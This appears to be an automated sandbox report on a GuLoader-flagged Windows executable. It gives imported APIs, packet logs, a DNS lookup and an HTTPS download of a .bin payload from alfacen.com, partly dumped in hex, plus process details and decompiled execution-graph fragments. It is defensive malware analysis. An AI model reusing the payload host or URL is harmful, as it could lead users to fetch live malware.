                                              ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                              COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                              ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 20, 2024 17:50:26.935816050 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:26.935847044 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:26.935921907 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:26.950678110 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:26.950694084 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.112889051 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.112971067 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.164561987 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.164578915 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.164802074 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.164849997 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.168955088 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.211431026 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.500209093 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.500233889 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.500263929 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.500278950 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.500289917 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.500329971 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.646864891 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.646934032 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.675554991 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.675637960 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:28.677102089 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:28.677162886 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.119563103 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.119573116 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.119682074 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.120012045 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.120074987 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.120764017 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.120841026 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.121737957 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.121807098 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.122667074 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.122704029 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.122733116 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.122745037 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.122757912 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.122802019 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.123722076 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.123788118 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.125353098 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.125411987 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.126209021 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.126267910 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.127166986 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.127230883 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.128168106 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.128230095 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.128887892 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.128952980 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.129957914 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.130026102 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.130912066 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.130971909 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.131831884 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.131891966 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.132154942 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.132215977 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.133311033 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.133378029 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.134293079 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.134361029 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.135329962 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.135401964 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.136162043 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.136223078 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.137124062 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.137183905 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.137953997 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.138015032 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.138906002 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.138966084 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.139853001 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.139920950 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.140351057 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.140410900 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.141060114 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.141118050 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.141124964 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.141175985 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.145112038 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.145199060 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.202713966 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.202775955 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.203353882 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.203423023 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204159021 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204231024 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204298019 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204348087 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204360962 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204369068 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204379082 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204399109 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.204405069 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.204441071 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.222415924 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.222429991 CEST44349839193.107.36.30192.168.2.4
                                              Oct 20, 2024 17:50:29.222438097 CEST49839443192.168.2.4193.107.36.30
                                              Oct 20, 2024 17:50:29.222481012 CEST49839443192.168.2.4193.107.36.30

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Oct 20, 2024 17:50:26.804383993 CEST4964653192.168.2.41.1.1.1
                                              Oct 20, 2024 17:50:26.926016092 CEST53496461.1.1.1192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                              Oct 20, 2024 17:50:26.804383993 CEST192.168.2.41.1.1.10xa694Standard query (0)alfacen.comA (IP address)IN (0x0001)false

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                              Oct 20, 2024 17:50:26.926016092 CEST1.1.1.1192.168.2.40xa694No error (0)alfacen.com193.107.36.30A (IP address)IN (0x0001)false

                                              HTTP Request Dependency Graph

                                              • alfacen.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              0192.168.2.449839193.107.36.304437984C:\Users\user\Desktop\3507071243740008011.exe
                                              TimestampBytes transferredDirectionData
                                              2024-10-20 15:50:28 UTC174OUTGET /jFhxxDhhDcCKVgiwlWM221.bin HTTP/1.1
                                              User-Agent: 5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: alfacen.com
                                              Cache-Control: no-cache
                                              2024-10-20 15:50:28 UTC344INHTTP/1.1 200 OK
                                              Date: Sun, 20 Oct 2024 15:50:28 GMT
                                              Server: Apache
                                              Upgrade: h2,h2c
                                              Connection: Upgrade, close
                                              Last-Modified: Fri, 18 Oct 2024 13:09:53 GMT
                                              Accept-Ranges: bytes
                                              Content-Length: 289344
                                              Cache-Control: max-age=2592000
                                              Expires: Tue, 19 Nov 2024 15:50:28 GMT
                                              Vary: Accept-Encoding
                                              Content-Type: application/octet-stream
                                              2024-10-20 15:50:28 UTC7848INData Raw: cd c4 32 61 fb d9 39 26 04 dc 17 79 65 ca 29 f9 97 dd 2a 9a b8 89 1e 30 82 1c ed 54 4b 5b 59 50 43 1b 3e 16 de 3c 83 74 45 d7 49 8f ec 93 7d 4b f9 34 07 20 ec 59 fd ec d2 6a 68 e5 55 1a a8 9e f3 26 b7 d8 f2 e5 47 a6 b0 ef a9 72 9e 2c 15 36 ad b1 22 69 1c 60 5f 47 67 ca c0 68 2b b1 91 2c 64 63 6f 3e 1c 5b 83 a9 4e d8 89 f9 0a 8e c1 1c 94 ca cd 5c 2d 40 ea df cb 0a 1a 11 ae 05 80 bf a4 7b 92 db e1 77 7b 7d 33 4c 89 18 00 6f be 63 16 40 e7 3e 92 aa 31 1e 97 9a 40 64 dd f7 4b d2 7a 7e 16 c7 7e 1b fd d5 bf 2d f0 b6 8f 7c d7 e3 e5 9f 72 f9 1a 2d 97 87 ba cd 8c a0 37 b6 8f a7 c5 53 de f8 c1 c9 1f 16 ed 07 03 be df 8e f4 01 b8 d9 0f 67 da c6 aa 59 02 97 90 eb 6d be 80 65 00 b1 80 20 bd b9 14 16 7d ac da da d9 10 7f b7 79 37 a8 67 27 32 bb 0d d0 8b 05 ae 35 91 e9
                                              Data Ascii: 2a9&ye)*0TK[YPC><tEI}K4 YjhU&Gr,6"i`_Ggh+,dco>[N\-@{w{}3Loc@>1@dKz~~-|r-7SgYme }y7g'25
                                              2024-10-20 15:50:28 UTC8000INData Raw: a6 8f d8 ec 96 d4 b8 54 a0 f4 74 2d 1c cc d0 54 9d 3e 18 25 71 93 e2 95 6d 51 55 39 9f d1 58 41 03 08 63 34 52 e9 00 d5 87 e6 6b 60 ca 61 3d 86 1d f1 99 26 fb 55 f8 79 b7 67 fd 7d a5 5f 56 bf 1b 05 6e 8d 09 91 0b d1 b0 7d 87 f5 f5 a5 f5 d3 fc e3 58 7a fc 5e ce 13 22 9f 7e 3e 4a f8 4d cc 35 bc 5d 07 54 a4 02 18 30 08 1b e2 86 7b fd fe c1 14 91 06 ef 95 63 6a b0 24 b7 c2 d2 13 d4 f1 bb 7a 79 1d 31 a7 ad b9 13 b4 aa 9f 44 9d 5e 0c 9c 39 a3 47 c6 03 ef cf 21 7a 6a 82 60 73 e1 59 89 da 89 0d b2 a8 b1 72 77 d7 64 7c 08 01 73 29 c0 f2 09 d1 11 d9 e5 10 7d 38 ec e5 44 3c 82 7f fc a4 de de 04 ea bd 38 6a e5 f2 f8 bd 24 10 2a 1c 94 b6 58 84 3f f9 60 70 ee 62 42 c0 11 c6 ae 74 30 11 3e 44 ce a0 cf f9 35 9d 05 ac b0 ef ca c3 65 b8 bc 5f 7c 03 45 75 20 bc a6 eb 93 71
                                              Data Ascii: Tt-T>%qmQU9XAc4Rk`a=&Uyg}_Vn}Xz^"~>JM5]T0{cj$zy1D^9G!zj`sYrwd|s)}8D<8j$*X?`pbBt0>D5e_|Eu q
                                              2024-10-20 15:50:28 UTC8000INData Raw: 8a 0f de 8d 04 28 e2 44 15 95 50 b8 cd 9e 33 df 25 e4 23 bf c0 8a 9c 7d 51 0d bd 89 60 e0 fa 87 28 48 a7 c5 a2 5f ea 67 11 c5 df 21 b3 fa 14 01 f2 f7 47 7c 78 af ef b3 ff 31 38 16 45 82 db 1f d6 81 3c 04 dd 2e e4 7c df 5e 07 17 5c 0b bc 6e 55 53 fe df b8 f4 48 3d 49 ca 86 d5 6a 32 86 0f 68 85 00 48 88 6d 09 48 d3 19 e2 93 c1 d4 89 99 25 2e ee 8b 61 f0 2a a4 06 63 7d 13 c3 1a 71 cb 6f 2f 1b 84 4f 4f 5e 8f 78 be e5 d6 af 77 6b d5 41 e6 40 70 73 3a 93 6d 60 ab a1 a1 94 f2 b0 ad a2 42 6b ee e7 c8 18 ea 9f a6 f4 76 84 58 ca cd 48 03 d1 cb b8 83 91 7b 78 d4 2e 61 f6 d5 8e 08 a8 75 78 8e ad 46 7c a1 ba 4e 09 98 d6 44 33 d4 9d 34 56 89 6c f9 6a 03 03 d9 3d 7c a8 72 3d ab 13 64 9a a0 b2 6f 66 1f 52 ab 1b 13 f1 f3 19 2b 72 3c 08 89 c5 ce 8f 3b f7 74 96 88 cc 1e 21
                                              Data Ascii: (DP3%#}Q`(H_g!G|x18E<.|^\nUSH=Ij2hHmH%.a*c}qo/OO^xwkA@ps:m`BkvXH{x.auxF|ND34Vlj=|r=dofR+r<;t!
                                              2024-10-20 15:50:28 UTC8000INData Raw: ab c3 13 e3 29 6e cc ad 14 aa b0 1d 0e b1 7a 68 d1 d9 77 35 0c 2c 44 37 ff 7c e8 95 ab 0f 66 79 80 e8 e1 2e f5 dd 85 6e 5d f6 a8 b7 a4 81 a3 0c 8e 20 3f eb 42 59 58 85 f8 4d 55 9a 6c b6 33 24 05 42 9d 32 d0 22 57 38 70 3b 0f 3b 36 54 9a 6f 14 e8 74 c1 ca a9 e9 80 2c 91 2a ef 23 bd d8 8f 40 f5 46 de b1 cc 37 43 df 75 ec 4e c4 24 0c 2d 94 07 80 44 21 bc f3 48 86 52 d8 fa cf d0 ad 2d 5c 2e 6d 32 b9 98 6b 63 35 40 1a 2b c5 5a d1 91 0c e6 09 ad da f3 b2 0c d8 ab 9f 51 79 57 a7 6d c3 16 12 e8 dc b6 11 3c 3c 79 a4 45 e6 67 27 b5 31 91 da 60 6a 95 31 40 c0 37 65 58 a6 53 92 c3 8b 64 a3 78 4d f2 d8 f0 1e ce 28 c1 5b 9f b8 05 de 30 f6 18 5c 7e e8 90 ae f1 27 85 74 be 7f d2 e9 db 09 0a d6 fa 42 74 11 aa 9a d3 90 04 38 10 5c 12 f2 3a 4a 24 c2 48 4e 81 ed e1 bc 35 9e
                                              Data Ascii: )nzhw5,D7|fy.n] ?BYXMUl3$B2"W8p;;6Tot,*#@F7CuN$-D!HR-\.m2kc5@+ZQyWm<<yEg'1`j1@7eXSdxM([0\~'tBt8\:J$HN5
                                              2024-10-20 15:50:29 UTC8000INData Raw: 47 de ae 68 9d 98 9d e2 7c 07 d0 73 7b 88 9c 14 22 09 bb 87 6f 93 1e 6a 47 26 d4 9c f3 9f 58 5e fc d9 8a df 0e ef 64 60 ad b8 3e bf 08 2b d0 e3 85 07 66 52 4f 82 9f 3a 71 32 29 88 a4 89 12 03 c1 fd 66 25 3c 03 e4 9f 89 9f b4 24 c9 45 2d 21 10 bd 43 20 93 a6 50 01 f8 60 13 0a 65 7a 2d 85 64 86 6c 54 58 e5 54 26 81 03 1d f7 94 94 01 92 85 a6 b8 92 83 05 c0 60 8f 4f 87 67 db 0c d5 37 37 3c 0d 96 c4 87 fe e4 94 91 db 2c dc 78 b7 e7 a3 aa 2a 9f 31 51 9d 41 7f 79 fa 75 10 26 6d dd 6c c4 0a 96 f0 d7 57 89 32 51 fa c6 6a 97 8d 35 66 0d d9 a4 07 a1 fa 24 3d 5f 86 8c bf 2b 17 b3 96 4b 40 1f 2b 01 a3 52 ec bd bb 47 a6 94 3a 8d 27 ee 81 e3 ec 08 a8 19 9d 4f 42 35 bf d5 34 5b 6e 82 c4 7e 18 cc ba b1 b6 99 53 f7 e3 8b 81 01 b5 3b 75 06 85 94 70 f2 a0 d8 7b e7 f8 22 19
                                              Data Ascii: Gh|s{"ojG&X^d`>+fRO:q2)f%<$E-!C P`ez-dlTXT&`Og77<,x*1QAyu&mlW2Qj5f$=_+K@+RG:'OB54[n~S;up{"
                                              2024-10-20 15:50:29 UTC8000INData Raw: 20 14 23 5d ca fa f2 91 a2 ce 49 99 1b 5b 8f 5f 02 de 55 3f 8c 21 c7 cb fd d2 6f c3 54 40 4a 84 5c 1c 26 d0 89 25 1f 93 1c 7a 29 7b 41 44 ac 89 09 98 26 26 03 81 70 2e dd 85 e1 bc f6 7d 5b b4 60 c1 b4 6b 4f 1c 92 7c a5 cc 9c 4f 6b c2 56 88 26 83 48 9a de 9f 3f 09 42 f8 81 1b 8b c2 5c 79 13 cb c4 48 8a 2b 3d a2 43 aa 72 90 97 7d e0 80 40 df d7 03 d6 57 eb d8 30 39 99 dd 2e bb c1 93 cb f4 de af e6 b5 7a a5 32 95 e0 d3 df 66 9c 92 35 8d 31 12 7e 59 3b 0b e5 ee 56 b5 7d 95 d3 0d 4e 6c a4 73 d5 48 25 d8 4e 69 08 b5 a3 1b b3 c7 7e 8d 5b 67 29 2b 96 e3 d7 a5 9c 61 e0 2b c7 9e 59 2b e2 bc cf 46 b8 bf 82 2a 5d c6 36 63 87 c6 44 cb 52 cf 7e 5a 60 39 35 66 92 4c 43 19 ba 4c dc 6a c8 d6 a6 5d a3 97 3c 9b 0e 5e 7b 2b 65 5c 25 95 63 40 b6 90 f6 88 9a 6a 44 95 b8 c0 fc
                                              Data Ascii: #]I[_U?!oT@J\&%z){AD&&p.}[`kO|OkV&H?B\yH+=Cr}@W09.z2f51~Y;V}NlsH%Ni~[g)+a+Y+F*]6cDR~Z`95fLCLj]<^{+e\%c@jD
                                              2024-10-20 15:50:29 UTC8000INData Raw: 2f ee b9 66 d5 64 2f ca 63 7d 0b 5d e8 98 1f 27 32 04 64 96 96 54 74 d7 e8 20 7d f4 39 2f 7e 27 1f 03 33 0a d7 19 6e ad ac 04 eb 9a 04 aa 6e 3b 3c e1 06 91 af 74 a7 74 e9 fa 34 12 89 8f b4 80 fa 6c 70 5b 4b db ff c8 57 c3 b1 0e c3 cd cf 07 cb d6 cb 50 cf 91 ea b1 82 0a d4 a8 40 5a 7e 43 bc 24 1d a1 61 05 b8 72 4b 64 aa 0e 55 0c e0 c4 7c d9 fe 69 b8 19 67 64 3d 29 39 e3 3e a1 0a d0 02 97 cb db 60 b1 59 4c d5 0e 4b e6 14 cf 05 88 fa 50 8f 96 b8 f4 f8 ad ed 75 42 6a fe 3d 1d 0c dd b1 54 f3 d3 0d 96 51 02 ef 2c b6 80 02 9a 96 23 df 04 05 2b 60 77 0d ac a5 b8 a9 da 71 bc f7 4f a2 b0 6d 8f 2a 51 ee cb c7 71 bd b8 95 ae 2e d0 cc c3 aa 0b a0 fd 80 db d4 fd a9 23 e6 10 db c5 82 89 29 03 00 ba 3a bf af 03 40 10 09 d7 9e b7 a0 c7 2a e6 c1 6c d0 ab 17 ce 69 0d 0d 76
                                              Data Ascii: /fd/c}]'2dTt }9/~'3nn;<tt4lp[KWP@Z~C$arKdU|igd=)9>`YLKPuBj=TQ,#+`wqOm*Qq.#):@*liv
                                              2024-10-20 15:50:29 UTC8000INData Raw: 47 8a 28 16 da 10 e2 3f c9 ef 6e 1c 85 0c 5b 11 27 72 93 a2 2c 61 24 c5 f0 ea 6d 3d 3b 97 9d 11 99 94 06 39 44 4d b7 6d 87 d8 73 b0 0c f6 7e 1f 4b 8d f6 0a 2a ec ee b0 11 fe 76 ba 83 9a b9 88 d0 a5 1e b8 91 76 a7 51 83 82 b2 d9 59 16 f2 2e 83 b1 d4 10 98 6d ad ee 7a 7c 4e 3e 4b 8c 1a 11 c8 71 ae 44 84 23 94 ab 8f 2f 72 08 28 3b 29 be 9b 81 95 5f 8d e6 00 69 6b fa 9d f9 43 22 cf 6a 10 fb 3a b6 aa dc 83 ff fe a5 64 5c 82 24 f4 01 14 2d a3 f6 82 10 46 0a 0e ea 41 ac 6c 6b 6f 06 d8 50 3c 2d aa ff b6 c6 0e ed 9d 2d 41 36 a6 aa f5 6e 3e 66 0f 16 8b df fd 8c d3 47 1d 49 a1 ce 08 3e 82 39 c4 b7 36 74 a7 ae 75 7c 77 06 79 a0 09 6a 5b ee 8e 56 64 34 2e c9 19 d8 17 fc 4f 39 30 5b ea 7c 72 1b ad 37 93 84 73 09 82 d5 f9 ad 3d 6c 66 7d f6 73 af 47 f7 a7 b7 32 38 2c 7b
                                              Data Ascii: G(?n['r,a$m=;9DMms~K*vvQY.mz|N>KqD#/r(;)_ikC"j:d\$-FAlkoP<--A6n>fGI>96tu|wyj[Vd4.O90[|r7s=lf}sG28,{
                                              2024-10-20 15:50:29 UTC8000INData Raw: ce a5 91 1c 26 fa 3f 5c ad 85 ca 4b 33 f3 5e e5 6e 91 87 da c5 0f 58 2f 14 8a b1 35 44 d9 57 9d a9 98 d4 51 9f 55 19 c0 a4 d0 9b 7a 34 62 43 e2 71 46 85 03 31 cc 38 97 4a 33 62 35 4e 3f ae 47 19 8c be f5 76 4b b9 f6 61 04 2c 32 d7 d3 3e f5 25 2a 33 6e ad f9 7c 6b 4c 86 8f 64 83 24 ad c3 c3 d2 bc 3d 3b 92 9d cf 2c 4c a4 00 b1 d0 6f 89 76 21 d0 b3 8f b1 17 58 45 9f 78 13 52 38 8e 15 bc 4d 39 23 59 6e e5 cd 4a e9 02 1d 4c c7 e6 0c 1b 8e 69 ec b8 b5 2f ea 58 16 78 33 a7 9b 35 a5 4a 4c f7 4f 2b 76 ba 27 7a 6a 2e 34 74 57 d4 30 73 4d 74 cb 72 9b 5c 33 95 3d 22 e2 bc c7 38 d2 a3 df 1c 1e d7 39 5b 5a ff 20 83 bb 76 15 90 07 9f 5c 26 1e ba fb 08 b1 8f 6e 55 c0 a9 a3 87 49 01 2e c2 df 12 8c 56 af fa 06 16 3e b2 ae 51 11 1f f1 fb 1a d5 84 d4 89 61 34 38 53 67 af 4b
                                              Data Ascii: &?\K3^nX/5DWQUz4bCqF18J3b5N?GvKa,2>%*3n|kLd$=;,Lov!XExR8M9#YnJLi/Xx35JLO+v'zj.4tW0sMtr\3="89[Z v\&nUI.V>Qa48SgK
                                              2024-10-20 15:50:29 UTC8000INData Raw: 6c 6c a7 e9 9f 49 1f fe ab ee b1 78 0c 44 f4 17 33 a9 4e 1d 0e 2e 88 fe 7c 7c 15 77 18 6e ed 37 65 6a 3d ab f2 fc da 73 fc 4a 4e 3e f2 da fa e2 b4 6f fb c6 9c 65 8a df 4a a3 a3 4b 32 3d a1 9e 7e 2c 8e 59 94 00 e9 af 9a 61 dd aa 68 3f 3a d8 12 b6 80 f0 23 f2 d5 67 23 f9 a3 20 f2 a7 e8 23 5a 80 c5 19 32 ae aa 23 a4 62 79 9d 2d d8 74 af 0a 9d ed 83 f7 ef cd 7d 22 0c ab 13 e2 e5 54 fa 20 57 96 d8 9f a8 8f 0c da 46 58 20 a9 6c 41 d5 80 27 32 cb 2a dd eb 91 ac 07 07 e9 c9 a4 ea 8b 3d 37 94 7a d7 d6 eb 8a b5 c2 b8 ff 9c 12 80 8c 9f d1 93 fd ba 66 60 e3 13 68 c6 a6 e7 2d a9 62 02 05 8d 78 58 70 30 4f 21 2d a9 f4 76 0d a2 fd 61 9c 61 c7 6e c3 b4 54 ae fe 8e 4d 1d 95 1b b4 75 45 fa b1 dc 35 91 c0 ff 94 c9 41 5f bb 1b e0 4e 8c c0 8f 5e 42 40 13 59 fc 69 5f de 69 02
                                              Data Ascii: llIxD3N.||wn7ej=sJN>oeJK2=~,Yah?:#g# #Z2#by-t}"T WFX lA'2*=7zf`h-bxXp0O!-vaanTMuE5A_N^B@Yi_i


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:11:48:58
                                              Start date:20/10/2024
                                              Path:C:\Users\user\Desktop\3507071243740008011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                              Imagebase:0x400000
                                              File size:986'863 bytes
                                              MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.2445417513.0000000005438000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:4
                                              Start time:11:50:17
                                              Start date:20/10/2024
                                              Path:C:\Users\user\Desktop\3507071243740008011.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\3507071243740008011.exe"
                                              Imagebase:0x400000
                                              File size:986'863 bytes
                                              MD5 hash:300FFB3FD65EB4A84A14802828F91E38
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:22.7%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:19.6%
                                                Total number of Nodes:1542
                                                Total number of Limit Nodes:46
                                                execution_graph 4934 10001000 4937 1000101b 4934->4937 4944 10001516 4937->4944 4939 10001020 4940 10001024 4939->4940 4941 10001027 GlobalAlloc 4939->4941 4942 1000153d 3 API calls 4940->4942 4941->4940 4943 10001019 4942->4943 4946 1000151c 4944->4946 4945 10001522 4945->4939 4946->4945 4947 1000152e GlobalFree 4946->4947 4947->4939 3894 401941 3895 401943 3894->3895 3896 402c37 17 API calls 3895->3896 3897 401948 3896->3897 3900 405990 3897->3900 3939 405c5b 3900->3939 3903 4059b8 DeleteFileW 3905 401951 3903->3905 3904 4059cf 3906 405aef 3904->3906 3953 406282 lstrcpynW 3904->3953 3906->3905 3971 4065c5 FindFirstFileW 3906->3971 3908 4059f5 3909 405a08 3908->3909 3910 4059fb lstrcatW 3908->3910 3954 405b9f lstrlenW 3909->3954 3911 405a0e 3910->3911 3915 405a1e lstrcatW 3911->3915 3917 405a29 lstrlenW FindFirstFileW 3911->3917 3915->3917 3916 405b18 3974 405b53 lstrlenW CharPrevW 3916->3974 3917->3906 3924 405a4b 3917->3924 3920 405ad2 FindNextFileW 3920->3924 3925 405ae8 FindClose 3920->3925 3921 405948 5 API calls 3923 405b2a 3921->3923 3926 405b44 3923->3926 3927 405b2e 3923->3927 3924->3920 3933 405a93 3924->3933 3958 406282 lstrcpynW 3924->3958 3925->3906 3929 4052e6 24 API calls 3926->3929 3927->3905 3930 4052e6 24 API calls 3927->3930 3929->3905 3932 405b3b 3930->3932 3931 405990 60 API calls 3931->3933 3935 406048 36 API calls 3932->3935 3933->3920 3933->3931 3934 4052e6 24 API calls 3933->3934 3936 4052e6 24 API calls 3933->3936 3959 405948 3933->3959 3967 406048 MoveFileExW 3933->3967 3934->3920 3937 405b42 3935->3937 3936->3933 3937->3905 3977 406282 lstrcpynW 3939->3977 3941 405c6c 